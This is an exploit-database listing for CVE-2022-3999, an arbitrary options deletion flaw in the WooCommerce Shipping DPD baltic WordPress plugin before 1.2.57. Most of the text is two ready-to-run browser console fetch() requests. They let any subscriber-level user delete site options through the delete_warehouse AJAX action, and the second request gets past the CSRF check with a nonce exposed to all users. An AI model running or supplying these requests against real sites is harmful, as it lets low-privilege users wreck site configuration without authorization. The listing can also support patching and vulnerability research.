Exploit for WooCommerce Shipping - DPD baltic < 1.2.57 - Subscriber+ Arbitrary Options Deletion CVE-2022-3999

Name: Exploit for WooCommerce Shipping - DPD baltic < 1.2.57 - Subscriber+ Arbitrary Options Deletion CVE-2022-3999
Rating: 5 (104 reviews)

2022-11-21 | CVSS 0.9

## https://sploitus.com/exploit?id=WPEX-ID:625AE924-68DB-4579-A34F-E6F33AA33643
Run the below command in the developer console of the web browser while being on the blog as any user to delete the blog options with ID 4 (usually the blogdescription):

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=delete_warehouse&option_id=4'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Note: In 1.2.11, a CSRF check was added but the nonce is available to any authenticated user via the admin_ajax_nonce JS variable in the backend (below command to be ran when logged in as a subscriber, from the Profile page, ie /wp-admin/profile.php):

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=delete_warehouse&option_id=4&admin_ajax_nonce=' + wc_dpd_baltic['admin_ajax_nonce']
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));